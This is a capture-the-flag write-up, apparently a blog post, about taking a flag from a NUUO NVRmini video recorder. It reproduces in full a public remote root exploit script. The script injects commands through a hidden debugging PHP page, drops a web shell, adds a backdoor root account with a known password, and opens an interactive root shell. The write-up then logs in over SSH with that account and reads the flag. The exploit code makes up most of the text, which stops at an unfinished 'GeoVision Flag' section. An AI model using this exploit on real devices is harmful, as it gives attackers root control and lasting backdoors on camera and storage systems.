Nuuo NVR Mini Flag

Fri, 07 Aug 2020 14:02:00

We were able to get the flag off of our first device using a known exploit. We found this known exploit by searching for the device + exploit in to Google. We found the following vulnerability in Exploit Database.

https://www.exploit-db.com/exploits/40209

Script

#!/usr/bin/env python
#
#
# NUUO Remote Root Exploit
#
#
# Vendor: NUUO Inc.
# Product web page: http://www.nuuo.com
# Affected version: <=3.0.8
#
# Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
# functionality. Setup is simple and easy, with automatic port forwarding
# settings built in. NVRmini 2 supports POS integration, making this the perfect
# solution for small retail chain stores. NVRmini 2 also comes full equipped as
# a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
# and RAID functions for data protection. Choose NVR and know that your valuable video
# data is safe, always.
#
# Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command
# injection vulnerability. Due to an undocumented and hidden debugging script, an attacker
# can inject and execute arbitrary code as the root user via the 'log' GET parameter in the 
# '__debugging_center_utils___.php' script.
#
# -----------------------------------------------------
# $ nuuo.py 10.0.0.17 80
# [*] ==============================================
# [*] NUUO NVR/DVR/NDVR Remote Root Exploit
# [*] Zero Science Lab - http://www.zeroscience.mk
# [*] ==============================================
# [*] Backdoor detected!
# [*] Add root user (y/n)? n
# [*] Press [ ENTER ] to start root shell...
#
# root@nuuo:~# id
# uid=0(root) gid=0(root)
#
# root@nuuo:~# exit
#
# [*] Removing raidh.php file
# [*] Session terminated!
#
# $
# -----------------------------------------------------
#
# Tested on: GNU/Linux 3.0.8 (armv7l)
#            GNU/Linux 2.6.31.8 (armv5tel)
#            lighttpd/1.4.28
#            PHP/5.5.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2016-5348
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php
# NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse
# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40209.zip
#
#
# 14.01.2016
#

import os######
import sys#####
import time####
import urllib##
import binascii
import requests
 
__author__ = 'lqwrm'

def persist(host,port,hexy,clean):

    pwd = '''echo 'roOt:x:0:0:PWNED account:/:/bin/bash' >> /etc/passwd'''
    sdw = '''echo 'roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::' >> /etc/shadow'''
    print '[*] Adding user \'roOt\' with password \'rewt\' in passwd file.'
    requests.get('http://'+host+':'+port+'/raidh.php?cmd='+pwd)
    time.sleep(2)
    
    print '[*] Updating shadow file.'
    requests.get('http://'+host+':'+port+'/raidh.php?cmd='+sdw)
    time.sleep(2)
    
    print '[*] Shell awaits: ssh roOt@'+host
    requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
    exit(0)

def check(host,port,hexy):

    try:
        r = requests.get('http://'+host+':'+port+'/'+hexy, allow_redirects=False)
        if r.status_code == 200:
            print '[*] Backdoor detected!'
            pass
        else:
            print '[*] No backdoors here. :('
            exit(0)
    except Exception:
        print '[*] Could not connect.'
        exit(0)

def main():

    print '[*] =============================================='
    print '[*] NUUO NVR/DVR/NDVR Remote Root Exploit'
    print '[*] Zero Science Lab - http://www.zeroscience.mk'
    print '[*] =============================================='

    if (len(sys.argv) <= 2):
        print '[*] Usage: nuuo.py <ipaddress> <port>'
        exit(0)

    host = sys.argv[1]
    port = sys.argv[2]

    dbgcu = '5f5f64'#
    dbgcu+= '656275'#
    dbgcu+= '676769'#
    dbgcu+= '6e675f'#
    dbgcu+= '63656e'#
    dbgcu+= '746572'#
    dbgcu+= '5f7574'#
    dbgcu+= '696c73'#
    dbgcu+= '5f5f5f'#
    dbgcu+= '2e7068'#
    dbgcu+= '70'###'#

    hexy = binascii.unhexlify(dbgcu)
    check (host,port,hexy)

    payload = '''echo "<?php system(\$_REQUEST[\'cmd\']); ?>" > raidh.php'''
    requests.get('http://'+host+':'+port+'/'+hexy+'?log=1337;' + payload)

    clean = 'rm raidh.php'
    a1 = raw_input('[*] Add root user (y/n)? ')
    if a1.strip() == 'y' or a1.strip() == 'Y':
        persist (host,port,hexy,clean)
    else:
        pass

    print '[*] Press [ ENTER ] to start root shell...'
    raw_input()

    while True:
        try:
            cmd = raw_input('root@nuuo:~# ')
            if cmd.strip() == '':
                print '[*] Give me a command!\n'
                continue
            else:
                e = requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(cmd))
                print e.text
            if cmd.strip() == 'exit':
                print '[*] Removing raidh.php file'
                requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
                print '[*] Session terminated!'
                break
        except Exception:
            break

if __name__ == "__main__":
    main()

Getting access

After running this script, we were able to log in with the credentails we added to the device.

ssh roOt@192.168.10.193

We will log in with the password that was created, rewt.

Grabbing the flag

The CTF challenge says that we need to get the flag off of the USB. We navigate to the mounted USB drive via

-bash-3.2# cd /mnt/USB1/
-bash-3.2# ls
USB1        flag.txt    lost+found
-bash-3.2# cat flag.txt 
SOHOplessly Brokenknown exploiteasy

GeoVision Flag

Initial Port Scan